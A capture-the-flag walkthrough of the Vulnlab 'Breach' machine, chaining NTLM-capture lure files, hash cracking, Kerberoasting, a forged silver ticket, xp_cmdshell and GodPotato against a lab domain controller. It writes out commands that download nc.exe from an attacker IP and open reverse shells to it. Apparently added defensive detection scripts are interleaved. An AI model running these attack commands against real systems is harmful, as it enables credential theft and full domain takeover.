Vulnlab - Breach


In this walkthrough, we will be going through the Breach room from Vulnlab. This room is rated Medium on the platform. It consists of capturing a user's NTLM hash by placing documents that a domain user is likely to open in an SMB share. Using the captured credentials, Kerberoasting is performed to get the password of the user svc_mssql. After that, a silver ticket attack has to be executed against MSSQL to get initial access. For privilege escalation, SeImpersonatePrivilege needs to be abused via the GodPotato exploit to get root on the target. So, let's get started without any delay.

Breach

Machine Info:

Title: Breach
IP address: 10.10.95.5
Difficulty: Medium
OS: Windows
Description: Breach is a Medium Windows machine that requires capturing a user's NTLM hash by placing documents that a domain user is likely to open in an SMB share. Using the captured credentials, Kerberoasting is performed to get the password of the user svc_mssql. After that, a silver ticket attack has to be executed against MSSQL to get initial access. For privilege escalation, SeImpersonatePrivilege needs to be abused via the GodPotato exploit to get root on the target.

Enumeration:

  • I started off with a regular nmap scan along with an all-TCP-port scan and a UDP scan. Found multiple ports open – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more.

$ sudo nmap -sV -sC 10.10.95.5
 
Starting Nmap 7.80 ( https://nmap.org ) at 2024-04-22 12:26 IST

Nmap scan report for 10.10.95.5
Host is up (0.18s latency).
Not shown: 987 filtered ports
PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-04-22 06:56:35Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server  15.00.2000.00
| ms-sql-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|_  Product_Version: 10.0.20348
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-04-22T06:52:26
|_Not valid after:  2054-04-22T06:52:26
|_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: BREACH
|   NetBIOS_Domain_Name: BREACH
|   NetBIOS_Computer_Name: BREACHDC
|   DNS_Domain_Name: breach.vl
|   DNS_Computer_Name: BREACHDC.breach.vl
|   DNS_Tree_Name: breach.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-04-22T06:56:48+00:00
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2024-04-21T06:51:40
|_Not valid after:  2024-10-21T06:51:40
|_ssl-date: 2024-04-22T06:57:27+00:00; 0s from scanner time.
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-info: 
|   10.10.95.5:1433: 
|     Version: 
|       name: Microsoft SQL Server 
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-04-22T06:56:50
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.85 seconds

sudo nmap -p- -T5 10.10.95.5

PORT      STATE SERVICE
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
3389/tcp  open  ms-wbt-server
5985/tcp  open  wsman
9389/tcp  open  adws
49664/tcp open  unknown
49667/tcp open  unknown
49669/tcp open  unknown
60843/tcp open  unknown
61065/tcp open  unknown
62932/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 391.54 seconds

sudo nmap -sU -T4 10.10.95.5

PORT    STATE SERVICE
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 141.03 seconds

  • Added hostname to my /etc/hosts file.

adding domain in /etc/hosts

PORT 80

  • The running webserver has a default IIS Page. Nothing fancy!

Default IIS page

  • Fired gobuster on the target but found no directories.

$ gobuster dir -u http://10.10.95.5/ -w ~/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt -x asp,aspx 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.95.5/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
2024/04/22 12:42:49 Starting gobuster in directory enumeration mode
===============================================================
                                
===============================================================
2024/04/22 13:00:41 Finished
===============================================================

PORT 135

  • Tried to enumerate usernames using rpcclient but got nothing.

RPC Enumeration

PORT 139/445

  • Tried to list the shares using SMB null authentication and got some interesting ones there – share and Users.

smbclient -L 10.10.95.5

SMB Enumeration

  • Next, I tried to peek into the “share” share and found three potential domain users.

$ smbclient //10.10.95.5/share

Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Feb 17 19:41:08 2022
  ..                                DHS        0  Thu Feb 17 21:08:00 2022
  finance                             D        0  Thu Feb 17 16:49:34 2022
  software                            D        0  Thu Feb 17 16:49:12 2022
  transfer                            D        0  Thu Feb 17 19:30:35 2022

		7863807 blocks of size 4096. 2613329 blocks available
smb: \> cd finance
smb: \finance\> ls
  .                                   D        0  Thu Feb 17 16:49:34 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022

		7863807 blocks of size 4096. 2615078 blocks available
smb: \finance\> cd ..
smb: \> cd software
smb: \software\> ls
  .                                   D        0  Thu Feb 17 16:49:12 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022

		7863807 blocks of size 4096. 2615616 blocks available
smb: \software\> cd ..
smb: \> cd transfer
smb: \transfer\> ls
  .                                   D        0  Thu Feb 17 19:30:35 2022
  ..                                  D        0  Thu Feb 17 19:41:08 2022
  claire.pope                         D        0  Thu Feb 17 16:51:35 2022
  diana.pope                          D        0  Thu Feb 17 16:51:19 2022
  julia.wong                          D        0  Thu Feb 17 16:54:39 2022

		7863807 blocks of size 4096. 2615794 blocks available
smb: \transfer\> cd claire.pope\
smb: \transfer\claire.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\claire.pope\*
smb: \transfer\claire.pope\> cd ..
smb: \transfer\> cd diana.pope\
smb: \transfer\diana.pope\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\diana.pope\*
smb: \transfer\diana.pope\> cd ..
smb: \transfer\> cd julia.wong\
smb: \transfer\julia.wong\> ls
NT_STATUS_ACCESS_DENIED listing \transfer\julia.wong\*
smb: \transfer\julia.wong\> exit

logging in SMB share

  • Looked into the Users share too, but found nothing except a bunch of VM files.

$ smbclient //10.10.95.5/Users

Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Thu Feb 17 18:42:16 2022
  ..                                DHS        0  Thu Feb 17 21:08:00 2022
  Default                           DHR        0  Thu Feb 10 14:40:33 2022
  desktop.ini                       AHS      174  Sat May  8 13:48:31 2021
  Public                             DR        0  Wed Sep 15 08:38:59 2021

		7863807 blocks of size 4096. 2832661 blocks available
smb: \> cd Default\
smb: \Default\> ls
  .                                 DHR        0  Thu Feb 10 14:40:33 2022
  ..                                 DR        0  Thu Feb 17 18:42:16 2022
  AppData                            DH        0  Thu Aug 19 12:15:22 2021
  Desktop                            DR        0  Thu Aug 19 11:54:36 2021
  Documents                          DR        0  Thu Feb 10 06:29:34 2022
  Downloads                          DR        0  Sat May  8 13:50:24 2021
  Favorites                          DR        0  Sat May  8 13:50:24 2021
  Links                              DR        0  Sat May  8 13:50:24 2021
  Music                              DR        0  Sat May  8 13:50:24 2021
  NTUSER.DAT                        AHn   524288  Thu Feb 17 21:08:01 2022
  ntuser.ini                       AHSn       20  Thu Aug 19 12:15:22 2021
  Pictures                           DR        0  Sat May  8 13:50:24 2021
  Saved Games                        Dn        0  Sat May  8 13:50:24 2021
  Videos                             DR        0  Sat May  8 13:50:24 2021

		7863807 blocks of size 4096. 2829523 blocks available
smb: \Default\> cd Desktop
smb: \Default\Desktop\> ls
  .                                  DR        0  Thu Aug 19 11:54:36 2021
  ..                                DHR        0  Thu Feb 10 14:40:33 2022
  EC2 Feedback.website                A      527  Tue Jun 21 21:06:17 2016
  EC2 Microsoft Windows Guide.website      A      554  Tue Jun 21 21:06:23 2016

smb: \Default\Desktop\> get "EC2 Feedback.website"
getting file \Default\Desktop\EC2 Feedback.website of size 527 as EC2 Feedback.website (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \Default\Desktop\> get "EC2 Microsoft Windows Guide.website"
getting file \Default\Desktop\EC2 Microsoft Windows Guide.website of size 554 as EC2 Microsoft Windows Guide.website (0.8 KiloBytes/sec) (average 0.7 KiloBytes/sec)
smb: \Default\Desktop\> cd ..
smb: \Default\> ls
  .                                 DHR        0  Thu Feb 10 14:40:33 2022
  ..                                 DR        0  Thu Feb 17 18:42:16 2022
  AppData                            DH        0  Thu Aug 19 12:15:22 2021
  Desktop                            DR        0  Thu Aug 19 11:54:36 2021
  Documents                          DR        0  Thu Feb 10 06:29:34 2022
  Downloads                          DR        0  Sat May  8 13:50:24 2021
  Favorites                          DR        0  Sat May  8 13:50:24 2021
  Links                              DR        0  Sat May  8 13:50:24 2021
  Music                              DR        0  Sat May  8 13:50:24 2021
  NTUSER.DAT                        AHn   524288  Thu Feb 17 21:08:01 2022
  ntuser.ini                       AHSn       20  Thu Aug 19 12:15:22 2021
  Pictures                           DR        0  Sat May  8 13:50:24 2021
  Saved Games                        Dn        0  Sat May  8 13:50:24 2021
  Videos                             DR        0  Sat May  8 13:50:24 2021

smb: \Default\> get NTUSER.DAT
getting file \Default\NTUSER.DAT of size 524288 as NTUSER.DAT (352.9 KiloBytes/sec) (average 168.0 KiloBytes/sec)

smb: \> exit

  • Next, I sprayed the usernames I had with crackmapexec, passing the username list as the password list as well, to check if any users had their username as their password, but got no luck.

crackmapexec smb 10.10.95.5 -u usernames.txt -p usernames.txt --continue-on-success

crackmapexec password spray

AS-REP Roasting

  • On the found usernames, I tried AS-REP roasting to check if any of them had Kerberos pre-authentication disabled, but had no luck.

python3 ~/Tools/impacket/examples/GetNPUsers.py -no-pass -usersfile usernames.txt -dc-ip 10.10.95.5 breach.vl/

AS-REP Roasting

PORT 389 (LDAP)

  • Next, I tried my luck with LDAP null authentication but got nothing back.

LDAP Enumeration

Exploitation:

  • I tested whether I could put a file on the “share” share and was able to do so. So I generated a bunch of files with the ntlm_theft script: if a domain user opens any of my generated files, I will be able to capture their NTLM hash with Responder.

python3 ntlm_theft.py --generate all --server 10.8.2.6 --filename breach

Creating docs using ntlm_theft.py

putting files on the share

  • I put my files in each folder of the share. After a couple of minutes, I got a hit on my Responder listener and got the NetNTLMv2 hash of the user Julia.Wong.

sudo python3 Responder.py -I tun0

Responder result

Julia.Wong::BREACH:e97e9ce91c17dd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
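From the defender's side, the lure files dropped above all share one trait: they embed a UNC or file:// reference to a host outside the domain, which is what makes the victim's client authenticate outward. The following Python script is an added example (not from the original post or from ntlm_theft) that scans a copy of a share for such references; the trusted-host list, the share layout and the sample files are constructed for the demo.

```python
"""Scan a copy of an SMB share for files that embed UNC/file:// references to
untrusted hosts, the pattern used by NTLM-capture lure documents.

Added example for this walkthrough, not part of the original post or of any
tool it mentions. The share contents built below are constructed for the demo.
"""
from __future__ import annotations

import re
import tempfile
import zipfile
from pathlib import Path

# Hosts allowed to appear in UNC paths on the share (assumed for the demo).
TRUSTED_HOSTS = {"breachdc", "breachdc.breach.vl"}

# Office Open XML containers: the reference hides in a .rels member, not in the outer bytes.
OOXML_EXTS = {".docx", ".xlsx", ".pptx", ".dotx"}

# Captures the host part of a \\host\share or file://host/path reference.
UNC_RE = re.compile(r"(?:\\\\|file://)([^\\/\s\"'<>]+)")


def _candidate_texts(path: Path):
    """Yield decoded views of a file in which a UNC reference could appear."""
    raw = path.read_bytes()
    if path.suffix.lower() in OOXML_EXTS:
        try:
            with zipfile.ZipFile(path) as zf:
                for name in zf.namelist():
                    yield zf.read(name).decode("utf-8", "ignore")
            return
        except zipfile.BadZipFile:
            pass  # not a real container; fall through to a raw scan
    yield raw.decode("latin-1")
    if path.suffix.lower() == ".lnk":
        # Shortcut files store the target path as UTF-16LE.
        yield raw.decode("utf-16-le", "ignore")


def scan_share(root: str) -> list[tuple[str, str]]:
    """Return sorted (relative file, host) pairs for references to untrusted hosts."""
    root_path = Path(root)
    findings = set()
    for path in root_path.rglob("*"):
        if not path.is_file():
            continue
        for text in _candidate_texts(path):
            for host in UNC_RE.findall(text):
                if host.lower() not in TRUSTED_HOSTS:
                    findings.add((path.relative_to(root_path).as_posix(), host))
    return sorted(findings)


def build_sample_share() -> str:
    """Create a constructed share tree: three lures, one legitimate link, one plain file."""
    root = Path(tempfile.mkdtemp(prefix="share_"))
    lure = "10.8.2.6"  # the listener address from the walkthrough, reused as sample data
    (root / "transfer").mkdir()
    (root / "transfer" / "breach.url").write_text(
        f"[InternetShortcut]\r\nURL=file://{lure}/breach\r\nIconFile=\\\\{lure}\\icon.ico\r\n"
    )
    (root / "transfer" / "breach.scf").write_text(
        f"[Shell]\r\nCommand=2\r\nIconFile=\\\\{lure}\\share\\test.ico\r\n"
    )
    (root / "finance").mkdir()
    with zipfile.ZipFile(root / "finance" / "invoice.docx", "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr(
            "word/_rels/settings.xml.rels",
            f'<Relationships><Relationship Id="rId1" Type="attachedTemplate" '
            f'Target="file://{lure}/breach.dotx" TargetMode="External"/></Relationships>',
        )
    (root / "software").mkdir()
    (root / "software" / "readme.url").write_text(
        "[InternetShortcut]\r\nURL=file://breachdc.breach.vl/share/software/notes.txt\r\n"
    )
    (root / "software" / "notes.txt").write_text("Nothing to see here.\r\n")
    return str(root)


if __name__ == "__main__":
    for rel, host in scan_share(build_sample_share()):
        print(f"{rel}: references untrusted host {host}")
```

Run it against a mounted or mirrored copy of a share; the result is the set of file/host pairs whose host is not on the allow-list. Removing write access for ordinary authenticated users on shares like “share”, and blocking outbound SMB (TCP 445) at the perimeter, close off the capture path itself rather than just spotting the lures.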

  • Cracked the hash using hashcat and got the password of the user Julia.Wong.

hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -O

Hash cracked

  • Logged into her folder in the share and got the user flag.

smbclient //10.10.95.5/share -U julia.wong --password=Computer1

cd transfer/julia.wong

get local.txt

local flag

Kerberoasting

  • After getting the flag, I wasn't able to get a shell as user julia.wong, so I enumerated other users on the domain. Found a list of them as per the result below. The interesting one among them was the svc_mssql account; we already know from the nmap scan that MSSQL is running on the target.

crackmapexec smb 10.10.95.5 -u julia.wong -p Computer1 --users

Enumerating domain users using CME

  • Next, performed Kerberoasting and got the TGS hash for the svc_mssql SPN. Cracked it with hashcat and got the password.

python3 ~/Tools/impacket/examples/GetUserSPNs.py breach.vl/julia.wong:Computer1 -dc-ip 10.10.95.5 -request

Kerberoasting

$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$a6fb065aa9ae44c3e2617d1733f9b283$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

hashcat -m 13100 sql_svc.hash /usr/share/wordlists/rockyou.txt -O

Hash cracked

Silver Ticket Attack

  • I was still not able to get shell access on the target with the svc_mssql creds. Tried to access MSSQL with mssqlclient but only got a limited, low-privileged SQL session. So I tried to perform a Silver Ticket attack.

A Silver Ticket attack is when an attacker forges a Kerberos service ticket (TGS) for a specific service in Active Directory using that service account's secret key, gaining access to the service without going through the KDC with legitimate credentials. Because the service validates the ticket with its own key alone, a forged ticket that carries an arbitrary user identity (such as Administrator) is accepted as genuine.

In order to create a Silver Ticket for a service, we need three things:

  1. Domain SID
  2. NTLM hash of the service account (here svc_mssql)
  3. SPN name of the service

  • To find the Domain SID, I used impacket's lookupsid script with Julia Wong's creds.

python3 ~/Tools/impacket/examples/lookupsid.py breach.vl/Julia.Wong:Computer1@10.10.95.5

Silver Ticket Attack

  • Used the online utility below to generate the NTLM hash of the svc_mssql password.

NTLM Hash Generator: https://codebeautify.org/ntlm-hash-generator

NTLM Hash Generator

  • Finally, created the silver ticket using impacket's ticketer script, specifying the Administrator user with RID 500 so that the forged ticket carries administrator privileges.

impacket.ticketer -nthash '69596C7AA1E8DAEE17F8E78870E25A5C' -domain-sid 'S-1-5-21-2330692793-3312915120-706255856' -domain breach.vl -spn 'MSSQLSvc/breach.vl:1433' -user-id 500 Administrator

creating a silver ticket
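The Kerberoasting above and the forged ticket created here each leave a different trace on the domain controller: a Kerberoast is a burst of 4769 service-ticket requests with RC4 encryption (etype 0x17) from one client, while a silver ticket is presented straight to the service and never produces a 4769 at all, so a Kerberos network logon (4624) with no preceding TGS request, often with an oddly formatted domain field, is the tell. The Python below is an added example, not part of the original post or Vulnlab; the event records are constructed with simplified field names modelled on those event IDs, and the ten-minute window and threshold of three SPNs are assumptions.

```python
"""Correlate Kerberos events to spot (a) Kerberoast-style RC4 service-ticket
requests and (b) Kerberos logons to a service with no matching TGS request on
the DC, the fingerprint of a forged (silver) ticket.

Added example for this walkthrough; not from the original post or Vulnlab.
Events are constructed records modelled on Windows Security event IDs 4769
(TGS request) and 4624 (logon); field names are simplified and values made up.
"""
from __future__ import annotations

from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPE = "0x17"
WINDOW = timedelta(minutes=10)  # how long a TGS may legitimately precede a logon (assumption)
ROAST_THRESHOLD = 3             # distinct SPNs requested with RC4 by one client (assumption)

# Constructed sample events: 4769 from the DC, 4624 from the host running the
# service (on Breach that is the DC itself, BREACHDC).
EVENTS = [
    {"id": 4769, "time": "2024-04-22T07:10:00", "account": "julia.wong@BREACH.VL",
     "service": "svc_mssql", "etype": "0x17", "client": "10.8.2.6"},
    {"id": 4769, "time": "2024-04-22T07:10:01", "account": "julia.wong@BREACH.VL",
     "service": "svc_backup", "etype": "0x17", "client": "10.8.2.6"},
    {"id": 4769, "time": "2024-04-22T07:10:01", "account": "julia.wong@BREACH.VL",
     "service": "svc_web", "etype": "0x17", "client": "10.8.2.6"},
    {"id": 4769, "time": "2024-04-22T07:30:00", "account": "diana.pope@BREACH.VL",
     "service": "svc_mssql", "etype": "0x12", "client": "10.10.95.20"},
    {"id": 4624, "time": "2024-04-22T07:31:00", "account": "diana.pope", "domain": "BREACH",
     "logon_type": 3, "package": "Kerberos", "source": "10.10.95.20", "target_host": "BREACHDC"},
    # Forged ticket: no TGS request ever hit the DC, and the domain field is the
    # DNS name as typed on the attacker side rather than the NetBIOS name.
    {"id": 4624, "time": "2024-04-22T08:05:00", "account": "Administrator", "domain": "breach.vl",
     "logon_type": 3, "package": "Kerberos", "source": "10.8.2.6", "target_host": "BREACHDC"},
]


def _user(account: str) -> str:
    """Normalise 'user@REALM' or 'user' to a lowercase user name."""
    return account.split("@", 1)[0].lower()


def find_kerberoasting(events, threshold: int = ROAST_THRESHOLD) -> dict[str, list[str]]:
    """Clients that requested RC4 service tickets for at least `threshold` distinct SPNs."""
    by_client: dict[str, set[str]] = defaultdict(set)
    for ev in events:
        if ev["id"] == 4769 and ev["etype"].lower() == RC4_ETYPE:
            by_client[ev["client"]].add(ev["service"])
    return {c: sorted(s) for c, s in by_client.items() if len(s) >= threshold}


def find_forged_logons(events, netbios_domain: str = "BREACH", window: timedelta = WINDOW):
    """Kerberos network logons with no 4769 for that user inside `window`, or an odd domain."""
    tgs = [(datetime.fromisoformat(e["time"]), _user(e["account"])) for e in events if e["id"] == 4769]
    alerts = []
    for ev in events:
        if ev["id"] != 4624 or ev.get("package") != "Kerberos" or ev.get("logon_type") != 3:
            continue
        t = datetime.fromisoformat(ev["time"])
        user = _user(ev["account"])
        reasons = []
        if not any(u == user and t - window <= tt <= t for tt, u in tgs):
            reasons.append("no matching 4769 on the DC")
        if ev["domain"] != netbios_domain:
            reasons.append(f"unexpected account domain {ev['domain']!r}")
        if reasons:
            alerts.append((ev["account"], ev["source"], tuple(reasons)))
    return alerts


if __name__ == "__main__":
    print("possible Kerberoasting:", find_kerberoasting(EVENTS))
    for account, source, reasons in find_forged_logons(EVENTS):
        print(f"suspicious logon {account} from {source}: {'; '.join(reasons)}")
```

In a real estate the 4624 events come from every host running a Kerberos-authenticated service and the 4769 events from all domain controllers, so the correlation has to be done in the SIEM with the logs already centralised; the logic stays the same. Moving service accounts to AES-only (msDS-SupportedEncryptionTypes) makes the RC4 filter a near-zero-noise alert, and rotating the service account's password invalidates every silver ticket minted from the old hash.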

Getting a shell

  • Now, I used the generated ticket to log into the MSSQL server, enabled xp_cmdshell, and used it to download a netcat binary to the target and execute it to give us a reverse shell.

export KRB5CCNAME=Administrator.ccache

impacket.mssqlclient -k -no-pass breach.vl -windows-auth

EXECUTE sp_configure 'show advanced options', 1;

RECONFIGURE;

EXECUTE sp_configure 'xp_cmdshell', 1;

RECONFIGURE;

EXECUTE xp_cmdshell 'whoami';

EXECUTE xp_cmdshell 'mkdir C:\Temp';

EXECUTE xp_cmdshell 'powershell.exe iwr -uri http://10.8.2.6:8000/nc.exe -Outfile C:\Temp\nc.exe';

EXECUTE xp_cmdshell 'C:\Temp\nc.exe 10.8.2.6 4444 -e cmd.exe';

exporting the admin ticket

downloading payload

got initial access
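Enabling xp_cmdshell the way shown above is recorded by SQL Server itself: every sp_configure change writes a “Configuration option … changed from X to Y” line to the ERRORLOG, and the enablement normally has to be preceded, seconds earlier on the same session, by turning on “show advanced options”. The Python below is an added example, not from the original post; the log excerpt is constructed to resemble ERRORLOG lines, and the dangerous-option list and the five-minute chaining window are assumptions.

```python
"""Flag enablement of xp_cmdshell and similar options in a SQL Server ERRORLOG.

Added example, not part of the original post. SAMPLE_LOG is constructed to
resemble ERRORLOG entries; the option list and chaining window are assumptions.
"""
from __future__ import annotations

import re
from datetime import datetime, timedelta

# Matches the sp_configure change message SQL Server writes to the ERRORLOG.
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{2}) (?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<opt>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

# Options that hand the SQL engine a path to the OS (assumed list for the demo).
DANGEROUS = {"xp_cmdshell", "Ole Automation Procedures", "Ad Hoc Distributed Queries", "clr enabled"}
CHAIN_WINDOW = timedelta(minutes=5)  # 'show advanced options' -> dangerous option on one spid

SAMPLE_LOG = """\
2024-04-22 07:38:02.11 Server      Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
2024-04-22 07:38:04.30 spid9s      Starting up database 'master'.
2024-04-22 07:52:10.45 spid58      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-04-22 07:52:13.02 spid58      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2024-04-22 09:15:00.00 spid71      Configuration option 'max server memory (MB)' changed from 2147483647 to 8192. Run the RECONFIGURE statement to install.
2024-04-22 09:20:41.77 spid58      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
"""


def find_config_changes(log_text: str) -> list[dict]:
    """Return one finding per dangerous option switched on; 'high' if chained after
    'show advanced options' on the same spid within CHAIN_WINDOW, else 'medium'."""
    findings = []
    last_advanced: dict[str, datetime] = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f")
        opt, new, spid = m["opt"], m["new"], m["spid"]
        if opt == "show advanced options" and new == "1":
            last_advanced[spid] = ts
            continue
        if opt in DANGEROUS and new != "0":
            chained = spid in last_advanced and ts - last_advanced[spid] <= CHAIN_WINDOW
            findings.append({"time": m["ts"], "spid": spid, "option": opt,
                             "severity": "high" if chained else "medium"})
    return findings


if __name__ == "__main__":
    for f in find_config_changes(SAMPLE_LOG):
        print(f"[{f['severity']}] {f['time']} {f['spid']} enabled {f['option']}")
```

Forwarding the ERRORLOG (or the equivalent SQL Audit events) to a SIEM turns this into a live alert. The configuration fix is to leave xp_cmdshell disabled, deny ALTER SETTINGS to logins that do not need it, and run the SQL Server service under a low-privilege or managed service account rather than one that also holds domain privileges.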

Privilege Escalation:

  • Once I landed a shell on the target, I looked into the privileges assigned to the user and found SeImpersonatePrivilege enabled. So I went directly for the Potato exploits.

whoami /all

whoami /all

  • Used the GodPotato exploit on the target to get a shell as NT AUTHORITY\SYSTEM.

GodPotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 10.8.2.6 5555"

GodPotato exploit

got root


Conclusion:


So that was “Breach” for you. We started off with a regular nmap scan and found multiple ports open – 80 (HTTP), 88 (Kerberos), 135 (RPC), 139/445 (SMB), 389 (LDAP) and many more. Next, created some documents using ntlm_theft.py and placed them in an SMB share, which eventually helped us capture the hash of the user Julia.Wong. Cracked the hash and performed Kerberoasting to get the password of the svc_mssql user. Next, performed a Silver Ticket attack to get initial access on the target. For privilege escalation, SeImpersonatePrivilege was abused via the GodPotato exploit to get root on the target. On that note, I will take your leave and will meet you in the next one. Till then, “Happy hacking”.
